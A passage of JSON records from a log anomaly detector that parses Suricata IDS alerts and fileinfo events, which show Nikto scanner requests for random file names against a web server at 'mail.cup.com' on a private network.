detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.168173 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46782 -> 192.168.10.154:80", "/parser/model/time": 1583349514.168173, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46782, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.168173 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46782 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.types", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.168368+0000\",\"flow_id\":941400980622918,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.168368, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":941400980622918,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.types\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.types\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.types", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.types", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46782, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":941400980622918,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 941400980622918, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.168368+0000\",\"flow_id\":941400980622918,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.169890 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46784 -> 192.168.10.154:80", "/parser/model/time": 1583349514.16989, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46784, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.169890 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46784 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.stat", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.170041+0000\",\"flow_id\":1023417676108868,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.170041, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1023417676108868,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.stat\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.stat\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.stat", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.stat", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46784, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1023417676108868,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1023417676108868, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.170041+0000\",\"flow_id\":1023417676108868,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": 
[ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.171543 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46786 -> 192.168.10.154:80", "/parser/model/time": 1583349514.171543, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46786, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.171543 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46786 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": 
"NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.aspx", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.171725+0000\",\"flow_id\":921236109171523,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.171725, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":921236109171523,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.aspx\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.aspx\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.aspx", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.aspx", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46786, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": 